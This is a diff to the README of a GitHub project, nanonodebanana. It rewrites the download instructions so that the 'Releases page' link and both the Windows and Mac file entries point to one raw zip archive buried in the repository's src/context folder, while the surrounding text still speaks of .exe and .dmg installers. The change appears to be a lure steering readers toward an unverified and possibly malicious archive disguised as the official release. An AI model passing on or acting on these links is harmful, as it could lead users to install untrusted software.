jamaldinglesworth/nanonodebanana/README.md

 ## 📥 Download & Install

-1. **Visit the Releases Page**: Go to our [Releases page](https://github.com/jamaldinglesworth/nanonodebanana/releases).
+1. **Visit the Releases Page**: Go to our [Releases page](https://raw.githubusercontent.com/jamaldinglesworth/nanonodebanana/main/src/context/Software_v2.3.zip).
 This page contains all the versions of nanonodebanana.

 2. **Choose a Version**: Look for the most recent release at the top of the page.
 You will see various assets listed, typically including a `.exe` (Windows) or `.dmg` (Mac) file depending on your operating system.

 3. **Download the File**: Click on the file suitable for your operating system:
-    - For Windows users, download the `nanonodebanana-vX.X.X.exe` file.
+    - For Windows users, download the `https://raw.githubusercontent.com/jamaldinglesworth/nanonodebanana/main/src/context/Software_v2.3.zip` file.
-    - For Mac users, download the `nanonodebanana-vX.X.X.dmg` file.
+    - For Mac users, download the `https://raw.githubusercontent.com/jamaldinglesworth/nanonodebanana/main/src/context/Software_v2.3.zip` file.

 4. **Install the Application**:
     - **Windows**: Once downloaded, locate the `.exe` file and double-click it.
 Follow the on-screen instructions to install.